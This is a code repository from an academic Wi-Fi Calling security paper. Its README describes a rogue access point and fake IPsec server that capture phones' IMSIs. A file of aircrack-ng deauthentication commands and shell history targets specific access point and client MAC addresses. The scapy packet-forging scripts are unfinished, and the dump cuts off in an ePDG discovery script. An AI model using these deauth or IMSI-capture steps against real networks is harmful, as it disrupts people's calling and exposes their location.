├── .gitignore
├── 180206_4thmessage-success_w_keys.pcapng
├── DoS_Attack_Wi_Fi_Calling
├── README.md
├── code
├── ipsecServer.py
├── phase1.py
└── phase2.py
├── epdg-discovery
├── README.md
├── discover.py
├── mcc_mnc_dump.json
├── search.py
└── search_log.txt
├── et1_at.py
├── et1_sprinter.py
├── et1_tmobile.py
├── et1_verizon.py
├── et2_at.py
├── et2_sprinter.py
├── et2_tmobile.py
├── et2_verizon.py
├── images
├── Diagram1.eps
└── diagram.eps
├── install
├── SoftAP.pdf
├── softAP_bolck
├── softAP_script
├── strong_swan_install.pdf
└── vmare.txt
└── sample
├── AT&T
├── 180201AT&T_SUCCESS.pcapng
└── 180201AT_KEY.txt
├── sprinter
├── 1891181350_sprinter.pcapng
└── sprinter_keys.txt
├── t-mobile
├── 180206-4th-keys.txt
├── 180206_4thmessage-success_w_keys.pcapng
└── log_sample.txt
└── verizon
├── 0124Verizon_fail.pcapng
├── 052518_verizon_success.pcap
├── 052518_verizon_success.pcapng
├── data1.pcap
├── data2.pcap
└── data3.pcap
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 |
3 | ## Core latex/pdflatex auxiliary files:
4 | *.aux
5 | *.lof
6 | *.log
7 | *.lot
8 | *.fls
9 | *.out
10 | *.toc
11 | *.fmt
12 | *.fot
13 | *.cb
14 | *.cb2
15 |
16 | ## Intermediate documents:
17 | *.dvi
18 | *-converted-to.*
19 | # these rules might exclude image files for figures etc.
20 | # *.ps
21 | # *.eps
22 | ## *.pdf
23 |
24 | ## Generated if empty string is given at "Please type another file name for output:"
25 | *.pdf
26 |
27 | ## Bibliography auxiliary files (bibtex/biblatex/biber):
28 | *.bbl
29 | *.bcf
30 | *.blg
31 | *-blx.aux
32 | *-blx.bib
33 | *.run.xml
34 |
35 | ## Build tool auxiliary files:
36 | *.fdb_latexmk
37 | *.synctex
38 | *.synctex(busy)
39 | *.synctex.gz
40 | *.synctex.gz(busy)
41 | *.pdfsync
42 |
43 | ## Auxiliary and intermediate files from other packages:
44 | # algorithms
45 | *.alg
46 | *.loa
47 |
48 | # achemso
49 | acs-*.bib
50 |
51 | # amsthm
52 | *.thm
53 |
54 | # beamer
55 | *.nav
56 | *.pre
57 | *.snm
58 | *.vrb
59 |
60 | # changes
61 | *.soc
62 |
63 | # cprotect
64 | *.cpt
65 |
66 | # elsarticle (documentclass of Elsevier journals)
67 | *.spl
68 |
69 | # endnotes
70 | *.ent
71 |
72 | # fixme
73 | *.lox
74 |
75 | # feynmf/feynmp
76 | *.mf
77 | *.mp
78 | *.t[1-9]
79 | *.t[1-9][0-9]
80 | *.tfm
81 |
82 | #(r)(e)ledmac/(r)(e)ledpar
83 | *.end
84 | *.?end
85 | *.[1-9]
86 | *.[1-9][0-9]
87 | *.[1-9][0-9][0-9]
88 | *.[1-9]R
89 | *.[1-9][0-9]R
90 | *.[1-9][0-9][0-9]R
91 | *.eledsec[1-9]
92 | *.eledsec[1-9]R
93 | *.eledsec[1-9][0-9]
94 | *.eledsec[1-9][0-9]R
95 | *.eledsec[1-9][0-9][0-9]
96 | *.eledsec[1-9][0-9][0-9]R
97 |
98 | # glossaries
99 | *.acn
100 | *.acr
101 | *.glg
102 | *.glo
103 | *.gls
104 | *.glsdefs
105 |
106 | # gnuplottex
107 | *-gnuplottex-*
108 |
109 | # gregoriotex
110 | *.gaux
111 | *.gtex
112 |
113 | # hyperref
114 | *.brf
115 |
116 | # knitr
117 | *-concordance.tex
118 | # TODO Comment the next line if you want to keep your tikz graphics files
119 | *.tikz
120 | *-tikzDictionary
121 |
122 | # listings
123 | *.lol
124 |
125 | # makeidx
126 | *.idx
127 | *.ilg
128 | *.ind
129 | *.ist
130 |
131 | # minitoc
132 | *.maf
133 | *.mlf
134 | *.mlt
135 | *.mtc[0-9]*
136 | *.slf[0-9]*
137 | *.slt[0-9]*
138 | *.stc[0-9]*
139 |
140 | # minted
141 | _minted*
142 | *.pyg
143 |
144 | # morewrites
145 | *.mw
146 |
147 | # nomencl
148 | *.nlo
149 |
150 | # pax
151 | *.pax
152 |
153 | # pdfpcnotes
154 | *.pdfpc
155 |
156 | # sagetex
157 | *.sagetex.sage
158 | *.sagetex.py
159 | *.sagetex.scmd
160 |
161 | # scrwfile
162 | *.wrt
163 |
164 | # sympy
165 | *.sout
166 | *.sympy
167 | sympy-plots-for-*.tex/
168 |
169 | # pdfcomment
170 | *.upa
171 | *.upb
172 |
173 | # pythontex
174 | *.pytxcode
175 | pythontex-files-*/
176 |
177 | # thmtools
178 | *.loe
179 |
180 | # TikZ & PGF
181 | *.dpth
182 | *.md5
183 | *.auxlock
184 |
185 | # todonotes
186 | *.tdo
187 |
188 | # easy-todo
189 | *.lod
190 |
191 | # xindy
192 | *.xdy
193 |
194 | # xypic precompiled matrices
195 | *.xyc
196 |
197 | # endfloat
198 | *.ttt
199 | *.fff
200 |
201 | # Latexian
202 | TSWLatexianTemp*
203 |
204 | ## Editors:
205 | # WinEdt
206 | *.bak
207 | *.sav
208 |
209 | # Texpad
210 | .texpadtmp
211 |
212 | # Kile
213 | *.backup
214 |
215 | # KBibTeX
216 | *~[0-9]*
217 |
218 | # auto folder when using emacs and auctex
219 | /auto/*
220 |
221 | # expex forward references with \gathertags
222 | *-tags.tex
223 |
--------------------------------------------------------------------------------
/180206_4thmessage-success_w_keys.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/180206_4thmessage-success_w_keys.pcapng
--------------------------------------------------------------------------------
/DoS_Attack_Wi_Fi_Calling:
--------------------------------------------------------------------------------
1 | iwconfig, put the wireless adaptor in monitor mode with airmon-ng
2 | airmon-ng start wlan0
3 |
4 | Monitor the available APs with Airodump-ng
5 |
6 | airodump-ng waln0mon
7 |
8 | connect to the AP for checking BSSID and MAC address of victim
9 |
10 | Broadcast deauthenticate users on the AP
11 | airplay-ng --deauth 1000 -a xx:xx:xx:xx:xx:xx -h xx:xx;xx:xx:xx:xx wlan-mon
12 |
13 | 1st xx: BSSID of the AP
14 | 2nd xx: MAC of vimctim
15 | 1000: # of deauth frames to send to the AP
16 |
17 |
18 | Fist mehtod
19 |
20 | 1913 iwconfig
21 | 1914 airmon-ng start wlan0
22 | 1915 airon-ng check kill
23 | 1916 airmon-ng check kill
24 | 1917 iwconfig
25 | 1918 airodump-ng wlan0mon
26 | 1919 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c ff:ff:ff:ff:ff:ff wlan0mon
27 | 1920 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c ff:ff:ff:ff:ff:ff wlan0mon
28 | 1921 airodump-ng wlan0mon
29 | 1924 cd tools
30 | 1925 cls
31 | 1926 ls
32 | 1927 cd a
33 | 1928 cd airgeddon/
34 | 1929 ls
35 | 1930 sudo bash airgeddon.sh
36 | 1931 cd tools
37 | 1932 cd airgeddon/
38 | 1933 l
39 | 1934 sl
40 | 1935 ls
41 | 1936 sudo bash airgeddon.sh
42 | 1937 airdump wlan0mon
43 | 1938 air-dump
44 | 1939 airodump-ng wlan0mon
45 | 1940 airodump-ng -c 11 --bssid 40:01:7A:19:21:C0
46 | 1941 airodump-ng -c 11 --bssid 40:01:7A:19:21:C0 wlan0mon
47 | 1942 airodump-ng -c 11 --bssid 18:80:90:E2:15:C0 wlan0mon
48 | 1943 airodump-ng -c 1 --bssid 18:80:90:E2:15:C0 wlan0mon
49 | 1944 cd tools
50 | 1945 cd airgeddon/
51 | 1946 ls
52 | 1947 sudo bash airgeddon.sh
53 | 1948 cd tools
54 | 1949 cd airgeddon/
55 | 1950 sudo bash airgeddon.sh
56 | 1951 iwconfig
57 | 1952 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
58 | 1953 aireplay-ng -0 1 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
59 | 1954 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
60 | 1955 aireplay-ng -0 1 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
61 | 1956 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
62 | 1957 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
63 | 1958 aireplay-ng -0 2 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
64 | 1959 aireplay-ng -0 3 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
65 | 1960 aireplay-ng -0 4 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
66 | 1961 aireplay-ng -0 5 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
67 | 1962 aireplay-ng -0 6 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
68 | 1963 aireplay-ng -0 7 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
69 | 1964 aireplay-ng -0 8 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
70 | 1965 aireplay-ng -0 9 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
71 | 1966 aireplay-ng -0 8 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
72 | 1967 aireplay-ng -0 9 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
73 | 1968 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
74 | 1969 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
75 | 1970 aireplay-ng -0 20 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
76 | 1971 aireplay-ng -0 50 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
77 | 1972 aireplay-ng -0 500 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
78 | 1973 aireplay-ng -0 900 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
79 | 1974 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
80 | 1975 aireplay-ng -0 2000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
81 | 1976 aireplay-ng -0 1500 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
82 | 1977 aireplay-ng -0 2000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
83 | 1978 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
84 | 1979 aireplay-ng -0 5000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
85 | 1980 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
86 | 1981 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
87 | 1982 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
88 | 1983 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c 00:CD:FE:26:85:70 wlan0mon
89 | 1984 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
90 | 1985 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
91 | 1986 aireplay-ng -0 5000 -a 00:14:D1:BD:56:ED -c 00:CD:FE:26:85:70 wlan0mon
92 | 1987 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
93 | 1988 aireplay-ng -0 50000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
94 | 1989 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
95 | 1990 aireplay-ng -0 50000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
96 | 1991 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
97 | 1992 iwconfig
98 | 1993 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
99 | 1994 iwconfig
100 | 1995 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
101 | 1996 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
102 | 1997 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
103 | 1998 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
104 | 1999 iwconfig
105 | 2000 cd tools
106 | 2001 ls
107 | 2002 cd airgeddon/
108 | 2003 ls
109 | 2004 bash airgeddon.sh
110 | 2005 history
111 |
112 | second method
113 |
114 | 1897 airodump-ng wlan0mon -c 11 --bssid 00:14:D1:BD:56:ED
115 | 1898 pwd
116 | 1899 ls -al
117 | 1900 cd tools
118 | 1901 mkdir tools
119 | 1902 cd tools
120 | 1903 git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
121 | 1904 cd airgeddon/
122 | 1905 ls
123 | 1906 ls -al
124 | 1907 sudo bash airgeddon.sh
125 | 1908 iwconfig
126 | 1909 sudo bash airgeddon.sh
127 | 1910 cd ..
128 | 1911 cd
129 | 1912 pwd
130 | 1913 iwconfig
131 | 1914 airmon-ng start wlan0
132 | 1915 airon-ng check kill
133 | 1916 airmon-ng check kill
134 | 1917 iwconfig
135 | 1918 airodump-ng wlan0mon
136 | 1919 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c ff:ff:ff:ff:ff:ff wlan0mon
137 | 1920 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c ff:ff:ff:ff:ff:ff wlan0mon
138 | 1921 airodump-ng wlan0mon
139 | 1922 history
140 | 1923 history 1823
141 | 1924 cd tools
142 | 1925 cls
143 | 1926 ls
144 | 1927 cd a
145 | 1928 cd airgeddon/
146 | 1929 ls
147 | 1930 sudo bash airgeddon.sh
148 | 1931 cd tools
149 | 1932 cd airgeddon/
150 | 1933 l
151 | 1934 sl
152 | 1935 ls
153 | 1936 sudo bash airgeddon.sh
154 | 1937 airdump wlan0mon
155 | 1938 air-dump
156 | 1939 airodump-ng wlan0mon
157 | 1940 airodump-ng -c 11 --bssid 40:01:7A:19:21:C0
158 | 1941 airodump-ng -c 11 --bssid 40:01:7A:19:21:C0 wlan0mon
159 | 1942 airodump-ng -c 11 --bssid 18:80:90:E2:15:C0 wlan0mon
160 | 1943 airodump-ng -c 1 --bssid 18:80:90:E2:15:C0 wlan0mon
161 | 1944 cd tools
162 | 1945 cd airgeddon/
163 | 1946 ls
164 | 1947 sudo bash airgeddon.sh
165 | 1948 cd tools
166 | 1949 cd airgeddon/
167 | 1950 sudo bash airgeddon.sh
168 | 1951 iwconfig
169 | 1952 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
170 | 1953 aireplay-ng -0 1 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
171 | 1954 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
172 | 1955 aireplay-ng -0 1 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
173 | 1956 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
174 | 1957 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
175 | 1958 aireplay-ng -0 2 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
176 | 1959 aireplay-ng -0 3 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
177 | 1960 aireplay-ng -0 4 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
178 | 1961 aireplay-ng -0 5 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
179 | 1962 aireplay-ng -0 6 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
180 | 1963 aireplay-ng -0 7 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
181 | 1964 aireplay-ng -0 8 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
182 | 1965 aireplay-ng -0 9 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
183 | 1966 aireplay-ng -0 8 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
184 | 1967 aireplay-ng -0 9 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
185 | 1968 aireplay-ng -0 10 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
186 | 1969 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
187 | 1970 aireplay-ng -0 20 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
188 | 1971 aireplay-ng -0 50 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
189 | 1972 aireplay-ng -0 500 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
190 | 1973 aireplay-ng -0 900 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
191 | 1974 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
192 | 1975 aireplay-ng -0 2000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
193 | 1976 aireplay-ng -0 1500 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
194 | 1977 aireplay-ng -0 2000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
195 | 1978 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
196 | 1979 aireplay-ng -0 5000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
197 | 1980 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
198 | 1981 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
199 | 1982 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
200 | 1983 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c 00:CD:FE:26:85:70 wlan0mon
201 | 1984 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
202 | 1985 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
203 | 1986 aireplay-ng -0 5000 -a 00:14:D1:BD:56:ED -c 00:CD:FE:26:85:70 wlan0mon
204 | 1987 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
205 | 1988 aireplay-ng -0 50000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
206 | 1989 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
207 | 1990 aireplay-ng -0 50000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
208 | 1991 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
209 | 1992 iwconfig
210 | 1993 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
211 | 1994 iwconfig
212 | 1995 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED
213 | 1996 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
214 | 1997 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
215 | 1998 aireplay-ng -0 3000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
216 | 1999 iwconfig
217 | 2000 aireplay-ng -0 0 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
218 | 2001 iwconfig
219 | 2002 aireplay-ng -0 0 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
220 | 2003 airodump-ng -c 11 --bssid 00:14:D1:BD:56:ED wlan0mon
221 | 2004 aireplay-ng -0 0 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
222 | 2005 aireplay-ng -0 1110 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
223 | 2006 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
224 | 2007 iwconfig
225 | 2008 airodump-ng wlan0mon
226 | 2009 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
227 | 2010 airodump-ng -c 11 wlan0mon
228 | 2011 aireplay-ng -0 1000 -a 00:14:D1:BD:56:ED -c EC:9B:F3:A1:6D:60 wlan0mon
229 |
230 |
231 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Wi Not Calling: Practical Privacy and Availability Attacks in Wi-Fi Calling
2 |
3 | ## Overview
4 | In this repository you will find the experimental data along with source code for our 'Wi Not Calling: Practical Privacy and Availability Attacks in Wi-Fi Calling' paper accepted by 2018 ACSAC (https://www.acsac.org/2018/).
5 |
6 | We analyzed the security of Wi-Fi Calling specifications and discover several vulnerabilities that allow an adversary to track the location of users and perform DoS attacks.
7 | By setting up a rogue access point in live testbed environment, we observed that user devices can leak the International Mobile Subscriber Identity (IMSI), despite it being encrypted.
8 | The leaked information can be further exploited for tracking user locations.
9 | We also discuss how these protocols are vulnerable to several denial of service attacks.
10 |
11 | The instructions for setting the experimental environment is illustrated in the sections below.
12 |
13 | ## Test Environment
14 | The diagram below shows two different test environment setup. In the first environment two physical hosts are used to prepare rogue AP and fake IPSec server, while only one physical host is used for both rogue AP and fake IPSec server in the second setup. We use the second setup (i.e., one physical host with VM) for our experiment.
15 |
16 | For the rogue AP, we use Kali Linux set as a rogue AP and Ubuntu 16.04 virtual machine on virtualbox as fake IPSec Server.
17 | For installation and setting up the rogue AP, please refer to the document named "SoftAP.pdf" in "install" folder.
18 | For fake IPSec server installation and settings, please refer to the documentation named "strong_swan.pdf" in the same folder.
19 |
20 | ## Performing the Test
21 | Please proceed with the following steps to perform the IMSI privacy attack described in our paper:
22 |
23 | 1. Run the phase 1 script (named "et1_[Service Provider Name].py") on the rogue AP and phase 2 script ("et2_[Service Provider Name].py") on the fake IPSec server, along with WireShark to collect packets exchanged.
24 | 2. Connect the victim UE to the rogue AP.
25 | 3. Once the UE is connected to the AP, enable Wi-Fi calling on the UE.
26 | 4. Using the key materials appear on fake IPSec server (i.e., strong_swan), decrypt the forged response packet on WireShark and you are able to see the payload including IMSI.
27 |
28 | ## Publication
29 | ```
30 | @inproceedings{winotcalling2018acsac,
31 | title = {{Wi Not Calling: Practical Privacy and Availability Attacks in Wi-Fi Calling}},
32 | author = {Jaejong Baek, Sukwha Kyung, Haehyun Cho, Ziming Zhao, Yan Shoshitaishvili, Adam Doupé, and Gail-Joon Ahn},
33 | booktitle = {In Proceedings of the 34th Annual Computer Security Applications Conference (ACSAC)},
34 | month = Dec,
35 | year = 2018,
36 | address = {San Juan, Puerto Rico, USA},
37 | }
38 | ```
39 |
40 | ## Demo video
41 | - Visit https://youtu.be/eMSA29MUcOU
42 |
43 | ## License
44 |
45 | - Under GPLv2.
46 | - Copyrights are specificed under LICENSE.
47 |
48 | ## Contact (Paper request)
49 |
50 | - Jaejong Baek
51 | - Sukwha Kyung
52 | - Haehyun Cho
53 |
54 |
--------------------------------------------------------------------------------
/code/ipsecServer.py:
--------------------------------------------------------------------------------
1 | # this is the process running on the ipsec server
2 |
3 | # extract keys
4 |
5 | # decrypt keys
6 |
7 | # record decrypted IMSI in the DB
8 |
--------------------------------------------------------------------------------
/code/phase1.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import sys
3 | import os
4 | import getopt
5 | from scapy.all import *
6 |
7 | def usage():
8 | print 'For help: "./rogueAp.py -h" or "./rogueAp.py --help"'
9 | print "Usage: ./rogueAp.py -i -o -a "
10 |
11 | def packet_proc():
12 | #TODO: Fix this module later
13 | # capture first 2 isakmp packets from input (i.e., Rogue-AP interface)
14 | for pkt in sniff(iface=wired_intf, filter="udp and port 500"):
15 | """
16 | if pkt.src in DB
17 | update geolocation
18 | else
19 | update both addr and DB
20 | """
21 | child_proc = os.fork()
22 | tlayer = pkt.getlayer(UDP)
23 | if pkt.getlayer(ISAKMP):
24 | data1 += str(tlayer.payload)
25 |
26 | send(IP(dst=ipsec_addr)/UDP()/ISAKMP(data1))
27 |
28 | os._exit(0)
29 |
30 | # set input, output interfaces and epdg server ip from arguments
31 | def main():
32 | try:
33 | opts, args = getopt.getopt(sys.argv[1:], "hi:o:a:", ["help"])
34 | except getopt.GetoptError as err:
35 | #print help info and exit
36 | print str(err)
37 | usage()
38 | sys.exit(2)
39 |
40 | if len(sys.argv) < 2:
41 | print "Error: option does not exist. Please try again."
42 | usage()
43 | sys.exit(2)
44 |
45 | ipsec_addr = None
46 | wired_intf = None
47 | wifi_intf = None
48 | for o, a in opts:
49 | if o == "-i":
50 | wired_intf = a
51 | elif o == "-o":
52 | wifi_intf = a
53 | elif o == "-a":
54 | ipsec_addr = a
55 | elif o in ("-h", "--help"):
56 | usage()
57 | sys.exit()
58 | else:
59 | #assert False
60 | print "Error: option does not exist. Please try again."
61 | usage()
62 | sys.exit(2)
63 |
64 | packet_proc()
65 | # NOTE: To check ue addr, we need to sniff WIFI interface, not the ethernet interface. Solve this problem.
66 | # capture the response from the ipsec server, send it to the user device.
67 |
68 | if __name__=='__main__':
69 | main()
70 |
71 |
--------------------------------------------------------------------------------
/code/phase2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import sys
3 | import os
4 | import getopt
5 | from scapy.all import *
6 |
7 | def usage():
8 | print 'For help: "./rogueAp.py -h" or "./rogueAp.py --help"'
9 | print "Usage: ./rogueAp.py -i -o -a "
10 |
11 | def packet_proc():
12 | #TODO: Fix this module later
13 | #TODO: Extract ue_addr
14 | # capture first 2 isakmp packets from input (i.e., Rogue-AP interface)
15 | for pkt in sniff(iface=wifi_intf, filter="udp and port 500"):
16 | """
17 | if pkt.src in DB
18 | update geolocation
19 | else
20 | update both addr and DB
21 | """
22 | data1 = ""
23 | child_proc = os.fork()
24 | tlayer = pkt.getlayer(UDP)
25 | if pkt.getlayer(ISAKMP):
26 | data1 += str(tlayer.payload)
27 |
28 | #send(IP(dst=ipsec_addr)/UDP()/ISAKMP(data1))
29 | send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
30 |
31 | os._exit(0)
32 |
33 | # set input, output interfaces and epdg server ip from arguments
34 | def main():
35 | try:
36 | opts, args = getopt.getopt(sys.argv[1:], "hi:o:a:", ["help"])
37 | except getopt.GetoptError as err:
38 | #print help info and exit
39 | print str(err)
40 | usage()
41 | sys.exit(2)
42 |
43 | if len(sys.argv) < 2:
44 | print "Error: option does not exist. Please try again."
45 | usage()
46 | sys.exit(2)
47 |
48 | ipsec_addr = None
49 | wired_intf = None
50 | wifi_intf = None
51 | for o, a in opts:
52 | if o == "-i":
53 | wired_intf = a
54 | elif o == "-o":
55 | wifi_intf = a
56 | elif o == "-a":
57 | ipsec_addr = a
58 | elif o in ("-h", "--help"):
59 | usage()
60 | sys.exit()
61 | else:
62 | #assert False
63 | print "Error: option does not exist. Please try again."
64 | usage()
65 | sys.exit(2)
66 |
67 | packet_proc()
68 | # NOTE: To check ue addr, we need to sniff WIFI interface, not the ethernet interface. Solve this problem.
69 | # capture the response from the ipsec server, send it to the user device.
70 |
71 | if __name__=='__main__':
72 | main()
73 |
74 |
--------------------------------------------------------------------------------
/epdg-discovery/README.md:
--------------------------------------------------------------------------------
1 | # ePDG Discovery
2 |
3 | This folder contains the files used to discover Evolved Packet Data Gateway (ePDG) servers.
4 |
5 | The script here performs the following tasks:
6 |
7 | - Enumerate through different MNC (Mobile Network Codes) and MCC (Mobile Country Codes) to generate the list of all ePDG servers.
8 |
9 | - Validate the existence of each ePDG server through DNS lookups.
10 |
11 | - Generate `iptables` commands to block connections to each in our test environment.
--------------------------------------------------------------------------------
/epdg-discovery/discover.py:
--------------------------------------------------------------------------------
1 | # ePDG Discovery Script
2 | from bs4 import BeautifulSoup
3 | import requests
4 | import json
5 | import socket
6 |
7 | all_mnc_mcc_data = []
8 |
9 | print("")
10 | print("")
11 | print("")
12 | print("")
13 |
14 | print("Starting ePDG discovery...")
15 | print("Fetching the latest database of MNCs and MCCs")
16 |
17 | # Grab the webpage
18 | page = requests.get("https://www.mcc-mnc.com/")
19 | # Setup the HTML parser
20 | soup = BeautifulSoup(page.content, 'html.parser')
21 | # Find all table rows
